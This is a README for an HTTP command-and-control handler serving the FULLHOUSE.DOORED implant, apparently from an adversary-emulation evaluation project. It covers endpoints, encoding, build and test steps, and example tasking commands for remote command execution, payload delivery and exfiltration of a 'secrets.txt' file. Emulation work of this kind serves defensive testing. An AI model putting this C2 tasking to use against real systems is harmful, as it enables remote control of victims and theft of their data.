The FULLHOUSE.DOORED HTTP Handler functions as the server-side counterpart to the FULLHOUSE.DOORED implant, and communicates with it over HTTP. The handler is configured to do the following:

  • respond to implant beacons / task requests with a task command
  • register a new implant with the control server, or indicate that a session already exists for the implant
  • process the task response data and upload to the control server
  • accept tasking from evalsC2client.py and send to implants when requested

# Components

The handler consists of an HTTP web server that listens on a specified address/port, and serves the following URL endpoints:

URL Endpoint Server Response Description
GET /request/{identifier} Heartbeat response, Implant task Heartbeat request / task request
POST /request/{identifier} Heartbeat response Initial implant registration and discovery data
POST /form/{identifier} Heartbeat response Task response from implant
GET /files/{filename} Contents of specified file File ingress request from implant
POST /submit Heartbeat response File exfiltration from implant, the filename is included in the HTTP header

The first packet from the FULLHOUSE.DOORED implant will contain the hostname, username, process ID, and its UUID. The implant will set a random sleep value (between 5-15 seconds) after it registers.

# Encryption

All communication to/from the FULLHOUSE.DOORED implant will be Base64 encoded and XOR'd. The entire JSON packet will be encoded.

# Usage

# Building

To build the control server binary, run the following command from the evalsC2server directory:

go build -o controlServer main.go

# Configuration

To enable and configure the FULLHOUSE.DOORED HTTP handler within the control server, provide a fullhouse entry in your handler configuration YAML file (see example below). Adjust the host and port values as necessary.


  port: 8080
  enabled: true

Run the controlServer binary as sudo and monitor the output to see FULLHOUSE handler updates. Ex:

sudo ./controlServer -c ./config/your_handler_config.yml

# Testing

Unit tests for the FULLHOUSE.DOORED HTTP handler are available in the fullhouse_test.go file. To run these tests, run the following command from the evalsC2server directory:

sudo go test ./...

To run only a single test, navigate to the evalsC2server\handlers\fullhouse directory and run:

sudo go test -run NameOfTestFunction

# Tasking

To submit a task to the C2 server, pass the task information to the REST API server in a JSON dictionary string containing the following fields:

Field Data Type Necessity Description
id int required The ID of the task the implant will execute. A table detailing the different tasks is available below.
arg string optional Command line arguments for the implant to execute OR paths for file upload/download.
payload string optional The name of the server-side payload to deliver as part of the task.

The following table contains the various acceptable commands and their meanings:

Command Arguments Implant Output Description
0 None None Heartbeat (no task available)
1 CLI arguments Process output of CLI args Command execution
2 Payload/file name and path None File ingress (C2 -> Implant)
3 File path None File exfiltration (Implant -> C2)

Use the following format to submit the commands from the evalsC2server directory:

./evalsC2client.py --set-task <UUID> '{"id": <id>, "payload": "<payload name>", "arg": "<args>"}'

Example commands:

  • 1: Task command execution of whoami

    ./evalsC2client.py --set-task <UUID> '{"id": 1, "arg":"whoami"}'
  • 2: Task file download of myPayload

    ./evalsC2client.py --set-task <UUID> '{"id": 2, "payload": "myPayload", "arg":"/path/to/write/myPayload"}'
  • 3: Task file upload of secrets.txt

    ./evalsC2client.py --set-task <UUID> '{"id": 3, "arg":"/path/to/secrets.txt"}'

# Troubleshooting

# CTI References

  1. https://www.mandiant.com/resources/blog/north-korea-supply-chain
  2. https://objective-see.org/blog/blog_0x77.html